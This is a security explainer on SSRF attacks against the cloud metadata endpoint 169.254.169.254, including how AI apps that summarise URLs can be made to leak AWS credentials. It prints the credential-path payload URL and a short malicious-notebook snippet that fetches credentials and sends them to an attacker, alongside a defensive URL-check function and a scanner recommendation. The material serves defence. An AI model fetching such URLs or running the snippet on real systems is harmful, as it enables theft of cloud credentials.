SSRF: The Cloud Metadata Attack Vector
The Magic IP: 169.254.169.254
If you run code on AWS, Google Cloud, or Azure, there is a special link-local IP address reachable from every instance: 169.254.169.254.
This is the Instance Metadata Service (IMDS). If you query it, it returns information about the server. Crucially, it can return temporary IAM credentials for the role attached to the server.
The Attack in AI Apps
AI applications often fetch data from URLs (e.g., "Summarize this article: [URL]"). If the application doesn't validate the URL, an attacker can input:
http://169.254.169.254/latest/meta-data/iam/security-credentials/
The AI app fetches this "article," reads the JSON containing the AWS keys, and summarizes it (or prints it) for the attacker.
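A URL check of the kind the paragraph above says is missing, as an added example (not code from the original page or from Veritensor). The function names, the injectable resolver and the blocked-range policy are assumptions made for illustration; the check looks at the address a host resolves to rather than the URL string.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hostname named on this page; extend with other metadata names you rely on.
METADATA_HOSTS = {"metadata.google.internal"}

def system_resolver(host):
    """Return every address the OS resolver gives for host (hypothetical helper)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_blocked_ip(addr):
    """True for link-local (169.254.0.0/16), loopback, private and other non-public ranges."""
    ip = ipaddress.ip_address(addr)
    mapped = getattr(ip, "ipv4_mapped", None)  # unwrap ::ffff:a.b.c.d to a.b.c.d
    if mapped is not None:
        ip = mapped
    return not ip.is_global or ip.is_multicast

def check_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a user-supplied URL, before any fetch happens."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").rstrip(".").lower()
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if not host:
        return False, "missing host"
    if host in METADATA_HOSTS:
        return False, "metadata hostname"
    try:
        addrs = {str(ipaddress.ip_address(host))}  # literal IP, no DNS needed
    except ValueError:
        try:
            addrs = set(resolver(host))
        except OSError:
            return False, "resolution failed"
    blocked = sorted(a for a in addrs if is_blocked_ip(a))
    if not addrs or blocked:
        return False, f"blocked or empty resolution: {blocked}"
    return True, "ok"
```

Run the same check on every redirect hop, and have the HTTP client connect to the address that was validated instead of resolving the name a second time.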
Malicious Models and Notebooks
This isn't just a web app issue. A malicious Jupyter notebook or pickled model running inside your VPC can execute:
import requests
creds = requests.get("http://169.254.169.254/...").text
send_to_attacker(creds)
Detecting SSRF Attempts
You should block this IP at the network level, but you should also scan your codebase for attempts to access it.
Veritensor flags any hardcoded instance of 169.254.169.254 or metadata.google.internal. Finding this string in a dataset or script is a massive red flag indicating an attempted cloud compromise.